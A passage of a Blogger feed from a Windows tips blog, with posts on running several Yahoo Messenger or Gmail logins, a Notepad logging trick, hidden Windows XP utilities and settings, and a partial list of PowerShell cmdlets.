/&gt;3. Save the file as MULTIYAHOO.REG&lt;br /&gt;4. Double Click on the File&lt;br /&gt;5. If it asks for confirmation click "Yes"&lt;br /&gt;5. Restart Your Yahoo messenger&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6295409734734829788?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6295409734734829788/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/yahoo-with-multiple-login-ids-without_16.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6295409734734829788'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6295409734734829788'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/yahoo-with-multiple-login-ids-without_16.html' title='Yahoo with multiple login IDs Without any Software'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1684034073324138264</id><published>2010-01-16T20:05:00.001-08:00</published><updated>2010-01-16T20:05:46.260-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><title type='text'>Yahoo with multiple login IDs Without any Software</title><content type='html'>Yahoo with multiple login IDs Without any Software&lt;br /&gt;&lt;br /&gt;TO USE MANY NUMBER OF YAHOO MESSENGERS AT A TIME WITHOUT NEED OF SOFTWARE &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;GO TO START MENU ACTUALLY SITUATED ON LEFT BOTTOM ON EVERY ONES PC &lt;br /&gt;&lt;br /&gt;THEN CLICK ON RUN &lt;br /&gt;&lt;br /&gt;TYPE CMD PRESS ENTER COMMAND PROMPT WILL OPEN &lt;br /&gt;&lt;br /&gt;IN COMMAND PROMT TYPE REGEDIT AND PRESS ENTER THEN REGISTRY EDITOR WILL OPEN &lt;br /&gt;&lt;br /&gt;IN REGISTRY EDITOR &lt;br /&gt;&lt;br /&gt;CLICK ON + SYMBOL NEAR HKEY_CURRENT_USER&lt;br /&gt;&lt;br /&gt;THEN THE FOLDERS UNDER HKEY_CURRENT_USER WILL BE SHOWN&lt;br /&gt;&lt;br /&gt;NOW CLICK ON + SYMBOL NEAR SOFTWARE &lt;br /&gt;&lt;br /&gt;THEN FOLDERS UNDER SOFTWARE WILL BE SHOWN &lt;br /&gt;&lt;br /&gt;THERE U ILL FIND A FOLDER NAMED YAHOO NOW CLICK ON + SYMBOL B4 IT&lt;br /&gt;&lt;br /&gt;THEN U ILL FIND A FOLDER NAMED PAGER CLICK THE+ SYMBOL B4 IT &lt;br /&gt;&lt;br /&gt;THEN U ILL FIND A FOLDER NAMED TEST CLICK ON IT &lt;br /&gt;&lt;br /&gt;ON THE RIGHT SIDE OF THE REGISTRY EDITOR U ILL FIND A REGISTRY ENTRY NAMED DEFAULT &lt;br /&gt;&lt;br /&gt;NOW BELOW IT RITE CLICK UR MOUSE SELECT NEW &gt;&gt; SELECT DWORD VALUE&gt;&gt; NAME IT AS PLURAL &lt;br /&gt;&lt;br /&gt;NOW CLICK ON NEW REGISTRY ENTRY CREATED BY U AND NAMED AS PLURAL IT WILL ASK FOR A VALUE GIVE IT 5 &lt;br /&gt;&lt;br /&gt;OR ANY NUMBER DEPENDS ON HOW MANY YAHOO MESSENGERS U WANNA USE AT A TIME &lt;br /&gt;&lt;br /&gt;CLOSE THE REGISTRY EDITOR AND CLICK ON YAHOO ICON AND U CAN OPEN ANY NUMBER OF YAHOO IDS AT ONCE....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1684034073324138264?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1684034073324138264/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/yahoo-with-multiple-login-ids-without.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1684034073324138264'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1684034073324138264'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/yahoo-with-multiple-login-ids-without.html' title='Yahoo with multiple login IDs Without any Software'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8061723503015480686</id><published>2010-01-16T20:04:00.001-08:00</published><updated>2010-01-16T20:04:52.493-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Multiple Logins of Gmail and Orkut through firefox</title><content type='html'>Just follow the following steps and you will be able to login in gmail and orkut with multiple accounts. Through this you will be able to make profiles in your firefox.&lt;br /&gt;&lt;br /&gt;Step 1:&lt;br /&gt;Open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.&lt;br /&gt;&lt;br /&gt;Step 2:&lt;br /&gt;variable name: moz_no_remote (should be all small letter).&lt;br /&gt;&lt;br /&gt;variable value: 1&lt;br /&gt;&lt;br /&gt;Step 3:&lt;br /&gt;open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.&lt;br /&gt;When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8061723503015480686?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8061723503015480686/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/multiple-logins-of-gmail-and-orkut.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8061723503015480686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8061723503015480686'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/multiple-logins-of-gmail-and-orkut.html' title='Multiple Logins of Gmail and Orkut through firefox'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4606073073099968131</id><published>2010-01-16T20:03:00.000-08:00</published><updated>2010-01-16T20:03:14.042-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><title type='text'>Cool Tip for NOTEPAD</title><content type='html'>This is real cool tip for people who use notepad to write down any info on a day to day basis... &lt;br /&gt;&lt;br /&gt;In Notepad&lt;br /&gt;&lt;br /&gt;* Open a notepad and type '.LOG' (CASE SENSITIVE) as the first line of the file.&lt;br /&gt;* Save and close the file .&lt;br /&gt;* Double-click the file to open it and notice that Notepad appends the current date and time to the end of the file and places the cursor on the next line.&lt;br /&gt;* Type your notes and then save and close the file.&lt;br /&gt;&lt;br /&gt;Each time you open the file, Notepad repeats the process, appending the time and date to the end of the file and placing the cursor below it.&lt;br /&gt;&lt;br /&gt;It simply serves as a virtual diary&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4606073073099968131?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4606073073099968131/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/01/cool-tip-for-notepad.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4606073073099968131'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4606073073099968131'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/01/cool-tip-for-notepad.html' title='Cool Tip for NOTEPAD'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2128205129405930258</id><published>2009-12-20T06:40:00.000-08:00</published><updated>2009-12-20T06:40:09.231-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>UNKNOWN TRICKS 4 WINDOWS XP</title><content type='html'>To run any of these apps go to Start &gt; Run and type the executable name (ie charmap).&lt;br /&gt;&lt;br /&gt;WINDOWS XP HIDDEN APPS:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1) Character Map = charmap.exe (very useful for finding unusual characters)&lt;br /&gt;&lt;br /&gt;2) Disk Cleanup = cleanmgr.exe&lt;br /&gt;&lt;br /&gt;3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)&lt;br /&gt;&lt;br /&gt;4) Dr Watson = drwtsn32.exe (Troubleshooting tool)&lt;br /&gt;&lt;br /&gt;5) DirectX diagnosis = dxdiag.exe (Diagnose &amp; test DirectX, video &amp; sound cards)&lt;br /&gt;&lt;br /&gt;6) Private character editor = eudcedit.exe (allows creation or modification of characters)&lt;br /&gt;&lt;br /&gt;7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)&lt;br /&gt;&lt;br /&gt;8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).&lt;br /&gt;&lt;br /&gt;9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).&lt;br /&gt;&lt;br /&gt;10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)&lt;br /&gt;&lt;br /&gt;11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).&lt;br /&gt;&lt;br /&gt;12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )&lt;br /&gt;&lt;br /&gt;13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).&lt;br /&gt;&lt;br /&gt;14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).&lt;br /&gt;&lt;br /&gt;15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).&lt;br /&gt;&lt;br /&gt;16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).&lt;br /&gt;&lt;br /&gt;17) File siganture verification tool = sigverif.exe&lt;br /&gt;&lt;br /&gt;18) Volume Contro = sndvol32.exe (I've included this for those people that lose it from the System Notification area).&lt;br /&gt;&lt;br /&gt;19) System Configuration Editor = sysedit.exe (modify System.ini &amp; Win.ini just like in Win98! ).&lt;br /&gt;&lt;br /&gt;20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).&lt;br /&gt;&lt;br /&gt;21) Microsoft Telnet Client = telnet.exe&lt;br /&gt;&lt;br /&gt;22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).&lt;br /&gt;&lt;br /&gt;23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).&lt;br /&gt;&lt;br /&gt;24) System configuration = msconfig.exe (can use to control starup programs)&lt;br /&gt;&lt;br /&gt;25) gpedit.msc used to manage group policies, and permissions[a very powerful tool if you know how to use it properly;-) ]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2128205129405930258?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2128205129405930258/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/12/unknown-tricks-4-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2128205129405930258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2128205129405930258'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/12/unknown-tricks-4-windows-xp.html' title='UNKNOWN TRICKS 4 WINDOWS XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4620854724260171223</id><published>2009-12-20T06:38:00.001-08:00</published><updated>2009-12-20T06:49:25.224-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>Hidden Facts About Windows XP</title><content type='html'>1. It boasts how long it can stay up. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type ’systeminfo’. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type ’systeminfo &amp;gt; info.txt’. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;&amp;nbsp;2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run… and type ‘gpedit.msc’; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care — some may stop your computer behaving as you wish. (Professional Edition only).&lt;br /&gt;&lt;br /&gt;3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter ‘rundll32.exe user32.dll,LockWorkStation’ in the location field. Give the shortcut a name you like. That’s it — just double click on it and your computer will be locked. And if that’s not easy enough, Windows key + L will do the same.&lt;br /&gt;&lt;br /&gt;4. XP hides some system software you might want to remove, such as Windows Messenger, but you can make it show everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word ‘hide’ and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be the software and you can now uninstall it.&lt;br /&gt;&lt;br /&gt;5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include ‘eventcreate’ and ‘eventtriggers’ for creating and watching system events, ‘typeperf’ for monitoring performance of various subsystems, and ’schtasks’ for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options.&lt;br /&gt;&lt;br /&gt;6. XP has IP version 6 support — the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type ‘ipv6 install’ into Run… (it’s OK, it won’t ruin your existing network setup) and then ‘ipv6 /?’ at the command line to find out more. If you don’t know what IPv6 is, don’t worry.&lt;br /&gt;&lt;br /&gt;7. You can at last get rid of tasks on the computer from the command line by using ‘taskkill /pid’ and the task number, or just ‘tskill’ and the process number. Find that out by typing ‘tasklist’, which will also tell you a lot about what’s going on in your system.&lt;br /&gt;&lt;br /&gt;8. XP will treat Zip files like folders, which is nice if you’ve got a fast machine. On slower machines, you can make XP leave zip files alone by typing ‘regsvr32 /u zipfldr.dll’ at the command line. If you change your mind later, you can change things back by typing ‘regsvr32 zipfldr.dll’.&lt;br /&gt;&lt;br /&gt;9. XP has ClearType — Microsoft’s anti-aliasing font display technology — but doesn’t have it enabled by default. It’s well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.&lt;br /&gt;&lt;br /&gt;10. You can use Remote Assistance to help a friend who’s using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your friend’s real IP address — they can find this out by going to www.whatismyip.com — and get them to make sure that they’ve got port 3389 open on their firewall and forwarded to the errant computer.&lt;br /&gt;&lt;br /&gt;11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As… and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.&lt;br /&gt;&lt;br /&gt;12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might go insane before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.&lt;br /&gt;&lt;br /&gt;13. You can start up without needing to enter a user name or password. Select Run… from the start menu and type ‘control userpasswords2′, which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.&lt;br /&gt;&lt;br /&gt;14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options… and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.&lt;br /&gt;&lt;br /&gt;15. XP comes with a free Network Activity Light, just in case you can’t see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You’ll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.&lt;br /&gt;&lt;br /&gt;16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.&lt;br /&gt;&lt;br /&gt;17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By… Show In Groups.&lt;br /&gt;&lt;br /&gt;18. Windows Media Player will display the cover art for albums as it plays the tracks — if it found the picture on the Internet when you copied the tracks from the CD. If it didn’t, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.&lt;br /&gt;&lt;br /&gt;19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.&lt;br /&gt;&lt;br /&gt;20. Windows XP secretly KNOWS that the average user has no idea what they are doing. Therefore, it doesn’t let you do really stupid things like deleting the windows directory (at least not without spending several hours convincing it that you REALLY want to do this). Oh yeah, and internet explorer kinda sucks, get Firefox.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4620854724260171223?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4620854724260171223/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/12/hidden-facts-about-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4620854724260171223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4620854724260171223'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/12/hidden-facts-about-windows-xp.html' title='Hidden Facts About Windows XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7934841955433389686</id><published>2009-12-20T06:37:00.002-08:00</published><updated>2009-12-20T06:37:54.991-08:00</updated><title type='text'>An A-Z Index of Windows PowerShell commands</title><content type='html'>A&lt;br /&gt;Get-Acl Get permission settings for a file or registry key&lt;br /&gt;Set-Acl Set permissions&lt;br /&gt;Get-Alias gal Return alias names for Cmdlets&lt;br /&gt;Import-Alias ipal Import an alias list from a file&lt;br /&gt;New-Alias nal Create a new alias.&lt;br /&gt;Set-Alias sal Create or change an alias&lt;br /&gt;Get-AuthenticodeSignature Get the signature object associated with a file&lt;br /&gt;Set-AuthenticodeSignature Place a signature in a .ps1 script or other file&lt;br /&gt;c&lt;br /&gt;Set-Location cd/chdir/sl Set the current working location&lt;br /&gt;Get-ChildItem dir/ls/gci Get child items (contents of a folder or registry key)&lt;br /&gt;Get-Command gcm Retrieve basic information about a command&lt;br /&gt;Measure-Command Measure running time&lt;br /&gt;Trace-Command Trace an expression or command&lt;br /&gt;Add-Content ac Add to the content of the item&lt;br /&gt;Get-Content cat/type/gc Get content from item (specific location)&lt;br /&gt;Set-Content sc Set content in the item (specific location)&lt;br /&gt;Clear-Content clc Remove content from a file/item&lt;br /&gt;ConvertTo-Html Convert the input into an HTML table&lt;br /&gt;ConvertFrom-SecureString Convert a secure string into an encrypted standard string&lt;br /&gt;ConvertTo-SecureString Convert an encrypted standard string into a secure string&lt;br /&gt;Clear-Host clear/cls Clear the screen&lt;br /&gt;Clear-Item cli Remove content from a variable or an alias&lt;br /&gt;Copy-Item copy/cp/cpi Copy an item from a namespace location&lt;br /&gt;Get-Credential Get a security credential (username/password)&lt;br /&gt;Get-Culture Get region information (language and keyboard layout)&lt;br /&gt;d&lt;br /&gt;Get-ChildItem dir/ls/gci Get child items (contents of a folder or registry key)&lt;br /&gt;Get-Date Get current date and time&lt;br /&gt;Set-Date Set system time on the host system&lt;br /&gt;Get-PSDrive gdr Get drive information (DriveInfo)&lt;br /&gt;New-PSDrive mount/ndr Install a new drive on the machine&lt;br /&gt;Remove-PSDrive rdr Remove a provider/drive from its location&lt;br /&gt;e&lt;br /&gt;Get-Eventlog Get eventlog data&lt;br /&gt;Get-ExecutionPolicy Get the execution policy for the shell&lt;br /&gt;Set-ExecutionPolicy Change the execution policy (user preference)&lt;br /&gt;Export-Alias epal Export an alias list to a file&lt;br /&gt;Export-Clixml Produce a clixml representation of powershell objects&lt;br /&gt;Export-Console Export console configuration to a file&lt;br /&gt;Export-Csv epcsv Export to Comma Separated Values (spreadsheet)&lt;br /&gt;Invoke-Expression Run a PowerShell expression&lt;br /&gt;Exit Exit Powershell&lt;br /&gt;f&lt;br /&gt;ForEach-Object foreach Loop for each object in the pipeline&lt;br /&gt;ForEach Loop through values in the pipeline&lt;br /&gt;Format-Custom fc Format output using a customized view&lt;br /&gt;Format-List fl Format output as a list of properties, each on a new line&lt;br /&gt;Format-Table ft Format output as a table&lt;br /&gt;Format-Wide fw Format output as a table listing one property only&lt;br /&gt;g&lt;br /&gt;Get-Item gi Get a file/registry object (or any other namespace object)&lt;br /&gt;Get-ChildItem dir/ls/gci Get child items (contents of a folder or registry key)&lt;br /&gt;h&lt;br /&gt;Get-Help help Open the help file&lt;br /&gt;Add-History Add entries to the session history&lt;br /&gt;Get-History history/h/ghy Get a listing of the session history&lt;br /&gt;Invoke-History r/ihy Invoke a previously executed Cmdlet&lt;br /&gt;Get-Host Get host information&lt;br /&gt;Clear-Host clear/cls Clear the screen&lt;br /&gt;Read-Host Read a line of input from the host console&lt;br /&gt;Write-Host Display objects through the host user interface&lt;br /&gt;i&lt;br /&gt;if Conditionally perform a command&lt;br /&gt;Import-Clixml Import a clixml file and rebuild the PS object&lt;br /&gt;Import-Csv ipcsv Take values from a CSV list and send objects down the pipeline.&lt;br /&gt;Get-Item gi Get a file object or get a registry (or other namespace) object&lt;br /&gt;Invoke-Item ii Invoke an executable or open a file (START)&lt;br /&gt;New-Item ni Create a new item in a namespace&lt;br /&gt;Remove-Item rm/del/erase/rd/ri/rmdir Remove an item&lt;br /&gt;Set-Item si Change the value of an item&lt;br /&gt;Clear-ItemProperty Delete the value of a property&lt;br /&gt;Copy-ItemProperty Copy a property along with its value&lt;br /&gt;Get-ItemProperty Retrieve the properties of an object&lt;br /&gt;Move-ItemProperty Move a property from one location to another&lt;br /&gt;New-ItemProperty Set a new property of an item at a location&lt;br /&gt;Remove-ItemProperty Delete the property and its value from an item&lt;br /&gt;Rename-ItemProperty Rename a property of an item&lt;br /&gt;Set-ItemProperty Set the value of a property&lt;br /&gt;k&lt;br /&gt;Stop-Process kill/spps Stop a running process&lt;br /&gt;l&lt;br /&gt;Get-Location pwd / gl Get and display the current location&lt;br /&gt;Pop-Location popd Set the current working location from the stack&lt;br /&gt;Push-Location pushd Push a location to the stack&lt;br /&gt;Set-Location cd/chdir/sl Set the current working location&lt;br /&gt;m&lt;br /&gt;Add-Member Add a member to an instance of a PowerShell object&lt;br /&gt;Get-Member gm Enumerate the properties of an object&lt;br /&gt;Move-Item move/mv/mi Move an item from one location to another&lt;br /&gt;o&lt;br /&gt;Compare-Object Compare the properties of objects&lt;br /&gt;Group-Object group Group the objects that contain the same value for a common property&lt;br /&gt;Measure-Object Measure the properties of an object&lt;br /&gt;New-Object Create a new .Net object&lt;br /&gt;Select-Object select Select properties of objects.&lt;br /&gt;Sort-Object sort Sort objects by property value&lt;br /&gt;Where-Object Filter the objects passed along the command pipeline.&lt;br /&gt;Out-Default Send output to default&lt;br /&gt;Out-File Send command output to a file&lt;br /&gt;Out-Host oh Send the pipelined output to the host&lt;br /&gt;Out-Null Send output to null&lt;br /&gt;Out-Printer lp Send the output to a printer&lt;br /&gt;Out-String Send objects to the host as strings&lt;br /&gt;p&lt;br /&gt;Powershell Launch a powershell session&lt;br /&gt;Convert-Path cvpa Convert a ps path to a provider path&lt;br /&gt;Join-Path Combine a path and child-path&lt;br /&gt;Resolve-Path rvpa Resolves the wildcards in a path&lt;br /&gt;Split-Path Return part of a path&lt;br /&gt;Test-Path Return true if the path exists, otherwise return false&lt;br /&gt;Get-Pfxcertificate Get pfx certificate information&lt;br /&gt;Pop-Location popd Set the current working location from the stack&lt;br /&gt;Push-Location pushd Push a location to the stack&lt;br /&gt;Get-Process ps/gps Get a list of processes on a machine&lt;br /&gt;Stop-Process kill/spps Stop a running process&lt;br /&gt;Clear-ItemProperty clp Remove the property value from a property&lt;br /&gt;Copy-ItemProperty cpp Copy a property along with it's value&lt;br /&gt;Get-ItemProperty gp Retrieve the properties of an object&lt;br /&gt;Move-ItemProperty mp Move a property from one location to another&lt;br /&gt;New-ItemProperty Set a new property&lt;br /&gt;Remove-ItemProperty rp Remove a property and its value&lt;br /&gt;Rename-ItemProperty rnp Renames a property at its location&lt;br /&gt;Set-ItemProperty sp Set a property at the specified location to a specified value&lt;br /&gt;Get-PsProvider Get information for the specified provider&lt;br /&gt;Set-PSdebug Turn script debugging on or off&lt;br /&gt;Add-PsSnapIn Add snap-ins to the console&lt;br /&gt;Get-PsSnapin List PowerShell snap-ins on this computer&lt;br /&gt;Remove-PSSnapin Remove PowerShell snap-ins from the console&lt;br /&gt;r&lt;br /&gt;Read-Host Read a line of input from the host console&lt;br /&gt;Remove-Item rm/del/erase/rd/ri/rmdir Remove an item&lt;br /&gt;Rename-Item ren/rni Change the name of an existing item&lt;br /&gt;Rename-ItemProperty Rename a property of an item&lt;br /&gt;s&lt;br /&gt;Get-Service gsv Get a list of services&lt;br /&gt;New-Service Create a new service&lt;br /&gt;Restart-Service Stop and then restart a service&lt;br /&gt;Resume-Service Resume a suspended service&lt;br /&gt;Set-Service Change the start mode/properties of a service&lt;br /&gt;Sort-Object sort Sort objects by property value&lt;br /&gt;Start-Service sasv Start a stopped service&lt;br /&gt;Stop-Service spsv Stop a running service&lt;br /&gt;Suspend-Service Suspend a running service&lt;br /&gt;Start-Sleep sleep Suspend shell, script, or runspace activity&lt;br /&gt;Select-String Search through strings or files for patterns&lt;br /&gt;t&lt;br /&gt;Tee-Object Send input objects to two places&lt;br /&gt;New-Timespan Create a timespan object&lt;br /&gt;Trace-Command Trace an expression or command&lt;br /&gt;Get-Tracesource Get components that are instrumented for tracing.&lt;br /&gt;Set-Tracesource Trace a PowerShell component&lt;br /&gt;Start-Transcript Start a transcript of a command shell session&lt;br /&gt;Stop-Transcript Stop the transcription process&lt;br /&gt;u&lt;br /&gt;Get-Uiculture Get the ui culture information&lt;br /&gt;Get-Unique gu Get the unique items in a collection&lt;br /&gt;Update-Formatdata Update and append format data files&lt;br /&gt;Update-Typedata Update the current extended type configuration&lt;br /&gt;v&lt;br /&gt;Clear-Variable clv Remove the value from a variable&lt;br 